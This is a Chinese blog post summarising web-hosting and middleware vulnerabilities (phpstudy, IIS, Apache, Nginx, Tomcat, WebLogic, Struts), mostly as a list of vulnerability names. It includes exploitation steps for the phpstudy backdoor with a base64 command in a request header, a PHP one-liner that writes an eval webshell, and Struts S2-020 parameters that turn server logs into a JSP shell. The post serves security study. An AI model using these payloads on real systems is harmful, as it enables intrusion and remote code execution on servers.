web建站与中间漏洞总结

最新推荐文章于 2024-06-21 15:30:00 发布
最新推荐文章于 2024-06-21 15:30:00 发布
阅读量259 收藏 2
点赞数
分类专栏: 安全 文章标签: 安全 shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33942040/article/details/112079183
版权

web建站漏洞总结

windows主流建站工具

宝塔
护卫神
phpstudy
upupw

phpstudy
phpstudy两个版本后门漏洞php-5.4.45与php-5.2.17两个版本
利用方法

请求包中Accept-Encoding: gzip, deflate,将gzip,deflate中间的空格删掉
Accept-Charset:+所执行命令的base64编码
如
c3lzdGVtKCduZXQgdXNlcicpOw==

在这里插入图片描述
一句话木马利用
在这里插入图片描述
修改蚁剑内的请求信息,处Header头修改如图下
即可连接
在这里插入图片描述

十大中间件漏洞类型总结

1.)IIS漏洞

1、PUT漏洞

2、短文件名猜解

3、远程代码执行

4、解析漏洞
IIS6.0 目录解析漏洞和文件解析漏洞;后面的不会处理因为可以进行构造.asp;.jpg 默认解析asp,asa,cer,cdx
IIS7.0 1.jpg/1.php进行解析 默认会当作
原因:配置文件的问题

跟木马有关系,如果是shell.php类即后面的名字设置为shell.php
<?php fputs(fopen('shell.php','w'),'<?php @eval($_POST[cmd])?>'); ?>
1.jpg/shell.php

2.)Apache漏洞

1、解析漏洞-->原理解析不了后面的后缀后即会往做解析内容导致-->从左往右进行解析导致
原因-->httpd.conf的配置文件出问题导致

2、目录遍历

3.)Niginx漏洞

1、文件解析

2、目录遍历

3、CRLF注入

4、目录穿越

4.)tomcat漏洞

1、远程代码执行

2、war后门文件部署

weblogic漏洞总结
5.)jboss漏洞

1、反序列化漏洞

2、war后门文件部署

6.)weblogic漏洞

1、反序列化漏洞

2、SSRF

3、任意文件上传

4、war后门文件部署

7.)strtuts漏洞

s2-020漏洞
原理:通过class.classLoader进行修改tomcat配置,以达到getshell的目的
常见组合拳
更改路径为日志的路径,然后结合日志记录的状况拿到shell
如
①class.classLoader.resources.context.parent.pipline.first.directory=wbeapps/ROOT
-->即修改为网站的根目录
②把日志的后缀修改为.jsp
class.classLoader.resources.context.parent.pipline.first.suffix=.jsp
③把日志的名字修改为shell
class.classLoader.resources.context.parent.pipline.first.prefix=.jsp

然后访问shell.jsp即可拿到shell

8.)java string 漏洞
9.)python
10.)其余组件的漏洞

1、FastCGI未授权访问、任意命令执行

2、PHPCGI远程代码执行

详解
九大漏洞类型详细规则学习
iis组件漏洞

goddemon
关注
专栏目录
[网络安全自学篇] 五十六.i春秋老师分享小白渗透之路及Web渗透技术总结
杨秀璋的专栏
03-05 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文讲解了Windows漏洞利用知识和DEP堆栈执行保护机制,通过构造ROP链来绕过DEP保护,并编漏洞利用脚本并实现自动化攻击。本文将分析i春秋YOU老师的小白渗透之路,并结合作者系列文章总结Web渗透技术点,非常适合初学者学习,希望对您有所帮助~
[网络安全自学篇] 四十八.Cracer第八期——(1)安全术语、Web渗透流程、Windows基础、注册表及黑客常用DOS命令
杨秀璋的专栏
02-21 2万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了微软证书漏洞(CVE-2020-0601),并详细讲解了Windows验证机制、可执行文件签名复现及HTTPS劫持。本文将分享另一个主题——Cracer教程,第一篇文章将详细讲解安全术语、Web渗透流程和Windows基础、注册表及黑客常用DOS命令。基础性文章,希望对您有所帮助。
WEB安全-中间漏洞
qq_59350385的博客
05-10 589
IIS 解析漏洞(iis6.x) 基于文件名,该版本默认会将*.asp;jpg此种格式的文件名,当成Asp解析,原理是服务器默认不解析;及后面的内容,相当于截断。 基于文件夹名,该版本 默认会将 *.asp/目录下的所有文件当成Asp解析。 另外,IIS6.x除了会将扩展名为.asp的文件解析为asp之外,还默认会将扩展名为.asa,.cdx,.cer解析为asp,从网站属性->主目录->配置 可以看出,他们都是调用了asp.dll进行的解析。 修复建议 1. 限制上传目录执行权限,
Web中间件常见漏洞总结
小小猪的博客
11-17 1955
一、IIS中间组件: 1、PUT漏洞 2、短文件名猜解 3、远程代码执行 4、解析漏洞 二、Apache中间组件: 1、解析漏洞 2、目录遍历 三、Nginx中间组件: 1、文件解析 2、目录遍历 3、CRLF注入 4、目录穿越 四、Tomcat中间组件: 1、远程代码执行 2、war后门文件部署 五、jBoss中间组件: 1、反序列化漏洞 2、war后门文件部署 六、WebLogic中间组件: 1、反序列化漏洞 2、SSRF 3、任意文件上传 4、war后门文
记一次服务器入侵事件的应急响应
最新发布
2401_84466336的博客
06-21 1230
我们推测攻击者不止一个,并且都是通过SSH弱口令入侵服务器。事件时间线如下图所示:第一波攻击者可能是挖矿组织,在5月7日大概率利用SSH弱口令进入服务器上传挖矿程序somescript,且做了对应的维持手段。第二波攻击者可能是黑产组织,攻击时间为7月16日至7月17日,其操作是对网站做黑帽SEO,更改宝塔后台并上传大量后门。第三波攻击者应该只是想控制一批跳板机,在8月17日上传了代理程序,目前在服务器上出现的恶意事件最后截止也是到8月17日。
建站之星php 漏洞,建站之星任意文件上传漏洞
weixin_34229578的博客
04-04 301
#1 漏洞产生/module/mod_media.phpflash_picker() 和 image_picker() 两个函数image_picker() 函数$typeArr = array('image/jpeg','image/pjpeg');$flash_typeArr = array('image/jpeg','image/pjpeg');$file_info =& Param...
常见浅谈网站建设中常见漏洞
justJavaC的专栏
02-27 238
常见浅谈网站建设中常见漏洞网站营销中起到重要的作用。经常有人问,同样是试图通过建设网站打通网络营销道路,为什么有些企业接电话接到手软,有些企业网站建设完成上线后却迟迟无人问津呢? 作为多年专业经验的网站建设团队,灵动网络就部分无人问津的企业网站现状共同点进行一个初步分析:     1、使用大篇幅Flash作为网站设计主要元素   将Flash做为网站设计的主要元素,利弊相当明显。不得...
宝塔最新未授权访问漏洞及sql注入
m0_52514790的博客
02-23 1561
整个宝塔 WAF 核心防护功能的代码的确实有点粗糙,代码组织方式不像一个成熟软件该有的架构,小 Bug 一眼望不到头,今天分享的是一个未授权访问漏洞,普通用户可以无视宝塔的随机登录地址,无视宝塔的登录密码,直接操作后台的数据,实现人人都是管理员的效果。这段代码位于 /cloud_waf/nginx/conf.d/waf/public/waf_route.lua 文件中,源文件是 luajit 编译后的内容,反编译一下即可看到源码。话说这是临时工的代码吧,对于宝塔的配置来说,要满足这两个条件很难吗?
【愚公系列】2024年02月 《网络安全应急管理与技术实践》 005-网络安全应急技术与实践(黑客入侵技术)
热门推荐
时光隧道
02-06 7万+
WHOIS查询是一种用于确定域名或IP地址的所有者和注册信息的公共数据库查询服务。使用WHOIS查询,您可以查找域名的注册商、注册日期、到期日期、域名所有者的联系信息以及域名服务器等相关信息。WHOIS协议通常使用TCP端口43进行通信。请注意,由于WHOIS是公开数据库,因此某些敏感信息(例如个人联系信息)可能会被隐藏或保护,以保护个人隐私。
记一次src挖洞实战——逻辑漏洞
wulanlin的博客
01-08 6109
前言 在学习了大量web逻辑漏洞的知识后,想进行实战。练练手。作为小菜鸡的我,这是我第二次进行实战挖洞,可能会存在许多问题。望各位大师傅多多指点。 闲话少说,直接开整 实战 1.信息收集 首先,在src中找了一个网站应用,获得其域名地址为 “****.****.com”。 接下来就是一些常规操作(信息收集)啦。。。 1. 域名反查IP 我使用的是“超级ping”网站,不仅可以查看域名对应的IP地址,还可以查看其网址是否使用CDN技术,至于CDN技术是什么,我就不多说啦。 可以.
极致CMS 漏洞简单分析
ximo的博客
05-02 5127
环境搭建 极致CMS1.6.7 下载地址:https://www.jizhicms.cn/thread-95-1-1.html 目录框架 404.html A 后台控制文件 Conf 公共函数 FrPHP框架 Home 前台控制文件 Public 公共静态文件 README.md admin.php 后台入口 backup 备份 cache 缓存 favicon.ico index.php 前台入口 install readme.txt static 静态文件 web.co
宝塔严重未知安全漏洞(宝塔面板或Nginx异常)
Jan's的博客
12-09 5240
5、【企业版防篡改-重构版】插件可以有效防止网站被篡改,建议开启并设置root用户禁止修改文件(需要使用时再放开),另外,将。同时文件大小不一致的话,是因为安装方式的不同,极速安装包的安装大小一般都为5M,编译方式安装的大小大约为。)锁住,此目录在正常使用中不会有任何修改的行为,除了重装以外其他修改行为均可视为被篡改,所以将它锁上。另外,未出现异常问题正常使用的用户,我们给出加固建议,如果您担心面板存在风险,可以登录终端执行。1、升级面板到最新版,已经是最新版的,在首页修复面板,并开启。
宝塔漏洞复现
黑白的博客
09-06 1万+
声明 好好学习,天天向上 漏洞描述 宝塔面板是一款服务器管理软件,支持windows和linux系统,可以通过Web端轻松管理服务器,提升运维效率。例如:创建管理网站、FTP、数据库,拥有可视化文件管理器,可视化软件管理器,可视化CPU、内存、流量监控图表,计划任务等功能 该漏洞是phpmyadmin未鉴权,可通过特定地址直接登录数据库的漏洞 影响范围 宝塔Linux面板7.4.2版本 宝塔Linux测试版7.5.13 Windows面板6.8版本 复现过程 漏洞镜像可以用docker获取 先配置加速器(公
宝塔漏洞生成原因
震山的博客
08-20 1133
分析造成这个问题的背后思路
最新宝塔服务器面板漏洞
xj28555的博客
08-24 2757
0x001漏洞说明【法律无情,请不要以身试法】 宝塔面板Linux7.4.2以及Windows6.8版本PhpmyAdmin未加签权,通过IP:888/pma可以直接登录数据库,现已出现漏洞批量利用工具,可通过Zmap扫描全球888端口进行大规模提权 0x002解决方法 宝塔官方已发布紧急更新,所有使用此版本的用户升级到最新版即可解决 ...
宝塔+dedecms 文件上传漏洞bypass复现
2301_80127209的博客
04-18 760
知道,1方面要对小马进行base64编码, 另外一方面要对蚁剑进行魔改。申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。1,我先找的资料,是蚁剑的绕过disable_function。可以发现, 规则,对get,post ,cookie,等方式的eval,还有base64都进行了过滤。环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。千万要注意的是,这个得选择这个。
宝塔漏洞工具_宝塔面板破解版能否使用?几个可能引起的风险问题_入门渗透指南
程序员三九的博客
06-02 502
目前我们云服务器部署WEB可视化面板不缺少软件,有我们熟悉的宝塔面板、WDCP、AMH等,还有很多个人开发或者二次开发的云面板。但是用的较多的还是宝塔面板
宝塔面板漏洞 导致phpmyadmin数据库被任意浏览
网站安全资讯
08-24 723
2020年8月23日,SINE安全监测中心,监测到宝塔官方发布了漏洞补丁更新,该宝塔漏洞会导致phpmyadmin无需密码就能访问,并且能够对数据库进行增删改查等操作...
网传宝塔“0day”挂马事件—附检测脚本
afei001
12-18 1366
宝塔面板疑似出现重大安全漏洞。遭到攻击的服务器,Nginx会自动检测header中accept字段是否包含Gzip。如果包含,则会向目标页面中加入一段JS引用,从而实现恶意挂马。
FCKeditor漏洞详析:全面总结与修复策略
1. 版本2.2及之前:在与Apache服务器结合的Linux环境中,FCKeditor的一个关键漏洞涉及Action参数,当Media目录下的文件被恶意创建或修改时,可能会被注入HTML代码,形成shell脚本,这被称为跨站脚本攻击(XSS)。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

goddemon

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值